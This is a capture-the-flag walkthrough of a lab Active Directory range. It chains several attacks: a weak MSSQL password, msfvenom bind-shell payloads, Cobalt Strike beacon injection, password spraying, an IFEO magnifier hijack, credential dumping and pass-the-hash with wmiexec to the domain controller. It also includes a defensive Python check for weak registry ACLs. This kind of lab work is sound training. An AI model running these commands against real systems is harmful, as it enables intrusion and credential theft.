tsclient

A medium-difficulty domain-penetration range from 春秋云镜.
The range has 3 flags, each located on a different machine.

tag

MSSQL, Privilege Elevation, Kerberos, Domain Penetration, RDP

Information gathering

First scan the host with fscan:
./fscan.exe -h 39.98.113.109

start infoscan
39.98.113.109:80 open
39.98.113.109:1433 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.98.113.109 code:200 len:703 title:IIS Windows Server
[+] mssql 39.98.113.109:1433:sa 1qaz!QAZ

Machine 18

The output shows the MSSQL database has a weak password: username sa, password 1qaz!QAZ.

use exploit/windows/mssql/mssql_payload
set payload windows/x64/meterpreter/bind_tcp_uuid
set rhosts 39.98.113.109
set username sa
set password 1qaz!QAZ
set method cmd
set database master
exploit

You can also connect with mssqlclient:
/usr/bin/impacket-mssqlclient sa:1qaz\!QAZ@39.98.113.109 -port 1433
The msf module did not get through, so I switched to MDUT, which got a shell and also makes file upload convenient; I uploaded a payload and started a bind shell from it.
Generate a 64-bit Windows bind-shell payload locally:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5678 -f exe -o xx.exe
Then upload it to the target with MDUT and run:
start C:/迅雷下载/xx.exe
Configure msf:

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 39.98.113.109
set lport 5678
run

A meterpreter session comes back. The Administrator folder under Users cannot be accessed, so privilege escalation is needed; here the built-in msf escalation is used directly:
getsystem
Escalation succeeded.
Then:

type C:\Users\Administrator\flag\flag01.txt
_________ ________ ________ ___ ___ _______ ________ _________
|\___ ___\\ ____\|\ ____\|\ \ |\ \|\ ___ \ |\ ___ \|\___ ___\
\|___ \ \_\ \ \___|\ \ \___|\ \ \ \ \ \ \ __/|\ \ \\ \ \|___ \ \_|
\ \ \ \ \_____ \ \ \ \ \ \ \ \ \ \ \_|/_\ \ \\ \ \ \ \ \
\ \ \ \|____|\ \ \ \____\ \ \____\ \ \ \ \_|\ \ \ \\ \ \ \ \ \
\ \__\ ____\_\ \ \_______\ \_______\ \__\ \_______\ \__\\ \__\ \ \__\
\|__| |\_________\|_______|\|_______|\|__|\|_______|\|__| \|__| \|__|
\|_________|


Getting flag01 is easy, right?

flag01: flag{9fe8ec74-2a5a-4204-8783-ed9524af4dc1}


Maybe you should focus on user sessions...

Next, scan the subnet with fscan.
ipconfig
The host's IP is 172.22.8.18.
C:/迅雷下载/fscan.exe -h 172.22.8.0/24 -o C:/迅雷下载/result.txt

start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.8.15 is alive
(icmp) Target 172.22.8.18 is alive
(icmp) Target 172.22.8.46 is alive
(icmp) Target 172.22.8.31 is alive
[*] Icmp alive hosts len is: 4
172.22.8.31:445 open
172.22.8.18:1433 open
172.22.8.46:445 open
172.22.8.15:445 open
172.22.8.18:445 open
172.22.8.31:139 open
172.22.8.46:139 open
172.22.8.31:135 open
172.22.8.15:139 open
172.22.8.18:139 open
172.22.8.46:135 open
172.22.8.15:135 open
172.22.8.18:135 open
172.22.8.46:80 open
172.22.8.18:80 open
172.22.8.15:88 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo
[*]172.22.8.15
[->]DC01
[->]172.22.8.15
[*] NetBios 172.22.8.15 [+] DC:XIAORANG\DC01
[*] NetInfo
[*]172.22.8.46
[->]WIN2016
[->]172.22.8.46
[*] NetInfo
[*]172.22.8.31
[->]WIN19-CLIENT
[->]172.22.8.31
[*] WebTitle http://172.22.8.18 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.8.46 code:200 len:703 title:IIS Windows Server
[*] NetBios 172.22.8.31 XIAORANG\WIN19-CLIENT
[*] NetInfo
[*]172.22.8.18
[->]WIN-WEB
[->]172.22.8.18
[->]2001:0:348b:fb58:4fb:1e6a:d89d:8e92
[*] NetBios 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
已完成 16/16
[*] 扫描结束,耗时: 9.8022057s

Set up a proxy:
C:/xx/windows_x64_agent.exe -l 44444 -s 123
./linux_x64_admin -c 39.98.118.127:44444 -s 123

use 0
socks 12345

Penetrating machine 46

fscan found no vulnerabilities here, and trying IIS vulnerabilities got nothing either.
Look at what is running on machine 18; there is an established RDP connection:

TCP    172.22.8.18:3389       WIN19-CLIENT:49706     ESTABLISHED

Note:
3389 RDP remote desktop: brute force; Shift backdoor

Recalling the hint in flag01, check the logged-on user sessions.
Using the query command to list online users shows that user john is connected to this host over RDP:

C:\x>query user
query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
john rdp-tcp#0 2 Active 4:41 2025/8/3 19:32

C:\x>query session
query session
SESSIONNAME USERNAME ID STATE TYPE DEVICE
>services 0 Disc
console 1 Conn
rdp-tcp#0 John 2 Active

So CobaltStrike's process injection can be used here to get a beacon running as john: after connecting, list the processes and inject into any process owned by john.

[08/04 00:22:59] beacon> shell net use
[08/04 00:22:59] [*] Tasked beacon to run: net use
[08/04 00:23:01] [+] host called home, sent: 38 bytes
[08/04 00:23:02] [+] received output:
会记录新的网络连接。

状态 本地 远程 网络

-------------------------------------------------------------------------------
\\TSCLIENT\C Microsoft Terminal Services
命令成功完成。

[08/04 00:23:29] beacon> shell dir \\TSCLIENT\C
[08/04 00:23:29] [*] Tasked beacon to run: dir \\TSCLIENT\C
[08/04 00:23:34] [+] host called home, sent: 47 bytes
[08/04 00:23:37] [+] received output:
驱动器 \\TSCLIENT\C 中的卷没有标签。
卷的序列号是 C2C5-9D0C

\\TSCLIENT\C 的目录

2022/07/12 10:34 71 credential.txt
2022/05/12 17:04 <DIR> PerfLogs
2022/07/11 12:53 <DIR> Program Files
2022/05/18 11:30 <DIR> Program Files (x86)
2022/07/11 12:47 <DIR> Users
2022/07/11 12:45 <DIR> Windows
1 个文件 71 字节
5 个目录 30,037,176,320 可用字节

[08/04 00:23:39] beacon> shell type \\TSCLIENT\C\credential.txt
[08/04 00:23:39] [*] Tasked beacon to run: type \\TSCLIENT\C\credential.txt
[08/04 00:23:45] [+] host called home, sent: 63 bytes
[08/04 00:23:46] [+] received output:
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

Do you know how to hijack Image?

This yields a domain user's account and password plus a hint.
Try password spraying:
proxychains -q crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'
It returns STATUS_LOGON_FAILURE, meaning the password has expired.
Then try remote desktop to each IP (the three hosts other than machine 18 can all be tried, but only machine 46 logs in successfully):
proxychains rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p 'Ald@rLMWuy7Z!#'
The first logon forces a password change, after which you are on machine 46 via remote desktop.

Privilege escalation on machine 46

After logging in, this turns out to be only a low-privileged user, so privilege escalation is the next step; the earlier hint pointed to Image File Execution Options hijacking (IFEO hijacking).

PS C:\Users\Aldrich> get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
PSChildName : Image File Execution Options
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
CentralAccessPolicyId :
CentralAccessPolicyName :
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Owner : NT AUTHORITY\SYSTEM
Group : NT AUTHORITY\SYSTEM
Access : {System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAccessRule...}
Sddl : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;CCDCLCSWRPRC;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KR;;;BU)(A;CI;KR;;;AC)
AccessToString : CREATOR OWNER Allow FullControl
NT AUTHORITY\Authenticated Users Allow SetValue, CreateSubKey, ReadKey
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow ReadKey
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
AuditToString :
AccessRightType : System.Security.AccessControl.RegistryRights
AccessRuleType : System.Security.AccessControl.RegistryAccessRule
AuditRuleType : System.Security.AccessControl.RegistryAuditRule
AreAccessRulesProtected : True
AreAuditRulesProtected : False
AreAccessRulesCanonical : True
AreAuditRulesCanonical : True

What this command does:
View security permissions: shows which users/groups hold which rights on the registry key (Full Control, Read, Write, etc.).
Audit a critical registry key: Image File Execution Options is a sensitive location, commonly abused by malware to hijack program execution.

The key point is that NT AUTHORITY\Authenticated Users is granted SetValue and CreateSubKey. This means any ordinary user logged on to the system can modify this key, so registry image hijacking is possible; here the lock-screen magnifier is hijacked.

PS C:\Users\Aldrich> REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
操作成功完成。
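As an added defender-side example (not part of the original writeup), the following Python parses the Sddl string printed by Get-Acl above and flags any broad principal holding write rights on the IFEO key, which is exactly the Authenticated Users SetValue/CreateSubKey grant the escalation relies on; the hardened SDDL is a constructed comparison value, not something from the range.

```python
import re

# Registry access-right codes as written in SDDL ACE strings; on registry objects the
# generic DS codes (CC, DC, LC, ...) map onto the KEY_* rights named here.
RIGHT_NAMES = {
    "CC": "QueryValues", "DC": "SetValue", "LC": "CreateSubKey", "SW": "EnumerateSubKeys",
    "RP": "Notify", "WP": "CreateLink", "KA": "FullControl", "KR": "ReadKey",
    "KW": "WriteKey", "KX": "ExecuteKey", "GA": "GenericAll", "GW": "GenericWrite",
    "GR": "GenericRead", "WD": "WriteDac", "WO": "WriteOwner", "RC": "ReadPermissions",
}
# Rights that let a principal plant or change a Debugger value under IFEO.
WRITE_RIGHTS = {"SetValue", "CreateSubKey", "CreateLink", "FullControl", "WriteKey",
                "GenericAll", "GenericWrite", "WriteDac", "WriteOwner"}
# Trustee aliases that cover ordinary users. SYSTEM (SY), Administrators (BA) and
# CREATOR OWNER (CO) are expected to hold write rights on this key and are not flagged.
BROAD_TRUSTEES = {"AU": "Authenticated Users", "BU": "Users", "WD": "Everyone",
                  "IU": "Interactive", "AC": "All Application Packages", "DU": "Domain Users"}
ACE_RE = re.compile(r"\(([^)]*)\)")

def parse_dacl(sddl):
    """Return (ace_type, flags, [right names], trustee) for every ACE in the DACL."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # keep the DACL, drop any SACL
    aces = []
    for ace in ACE_RE.findall(dacl):
        ace_type, flags, rights, _obj, _inh_obj, trustee = ace.split(";")[:6]
        codes = [rights[i:i + 2] for i in range(0, len(rights), 2)]  # 2-char codes
        aces.append((ace_type, flags, [RIGHT_NAMES.get(c, c) for c in codes], trustee))
    return aces

def find_weak_aces(sddl):
    """Allow-ACEs granting write rights to a broad principal: {trustee: [rights]}."""
    weak = {}
    for ace_type, _flags, rights, trustee in parse_dacl(sddl):
        if ace_type == "A" and trustee in BROAD_TRUSTEES:
            granted = sorted(r for r in rights if r in WRITE_RIGHTS)
            if granted:
                weak[BROAD_TRUSTEES[trustee]] = granted
    return weak

# SDDL copied from the Get-Acl output above (the misconfigured key on machine 46).
IFEO_SDDL = ("O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;CCDCLCSWRPRC;;;AU)(A;CI;KA;;;SY)"
             "(A;CI;KA;;;BA)(A;CI;KR;;;BU)(A;CI;KR;;;AC)")
# Constructed variant with Authenticated Users cut back to read-only (KR) for comparison.
HARDENED_SDDL = IFEO_SDDL.replace("(A;CI;CCDCLCSWRPRC;;;AU)", "(A;CI;KR;;;AU)")

if __name__ == "__main__":
    for name, sddl in (("machine 46", IFEO_SDDL), ("hardened", HARDENED_SDDL)):
        print(name, find_weak_aces(sddl) or "no broad principal has write access")
```

The same check can be pointed at any SDDL obtained with Get-Acl ... | Select-Object -ExpandProperty Sddl on hosts you administer.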

Upload an msf payload in advance to make further operations easier. First route msf through the proxy:
proxychains msfconsole
Generate a 64-bit Windows bind-shell payload locally:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5678 -f exe -o xx.exe
Then upload it to the target over remote desktop, using rdesktop's -r option to share a local folder; the payload is placed under /temp:
proxychains rdesktop 172.22.8.46 -u Aldrich -d xiaorang.lab -p 'Ald@rLMWuy7Z!#' -r disk:mydisk="/temp"
The files in the local path are then visible on the remote machine; just drag them over.
Then lock the machine and click the magnifier at the bottom right; an administrator command prompt pops up.
Run:
start xx.exe
Configure msf:

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 172.22.8.46
set lport 5678
run

This yields SYSTEM privileges and flag02.txt can be read; of course it could already be read as soon as the administrator command prompt popped up.

Penetrating machine 15

Next step: look at the domain admins group.

net group "domain admins" /domain
这项请求将在域xiaorang.lab的域控制器处理。
组名 Domain Admins
注释 指定的域管理员
成员
----------------------------------
Administrator WIN2016$

WIN2016$ is in the Domain Admins group, so that machine account can log on to the domain controller via pass-the-hash.
Then use creds_all to dump credentials:

meterpreter > creds_all
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
Aldrich XIAORANG f833b1285fea0f548d6022081e030e55 4c4fdc74b86cde011a14be14c54cb74c5ae3456e 91ba27d3231a4ac6c9967e267f815d61
WIN2016$ XIAORANG 17b0ca4ae854dc2e5ba037fdb6ce9524 4be5a0c3c6e3ed6eaa64146e6d2e317f1dd43534
WIN2016$ XIAORANG 4ba974f170ab0fe1a8a1eb0ed8f6fe1a e06238ecefc14d675f762b08a456770dc000f763
mingzu$ WIN2016 b976ca603387721ba9bed4a7ea1b0103 9e9770aad669394ed98819c77f7cfb45c2142b2f

Use wmiexec with the WIN2016$ hash to log on to the domain controller directly:
proxychains4 /usr/bin/impacket-wmiexec -hashes 00000000000000000000000000000000:17b0ca4ae854dc2e5ba037fdb6ce9524 xiaorang.lab/WIN2016\$@172.22.8.15
Then read flag03.txt.

Supplement

To fix garbled Chinese output in the console:
chcp 65001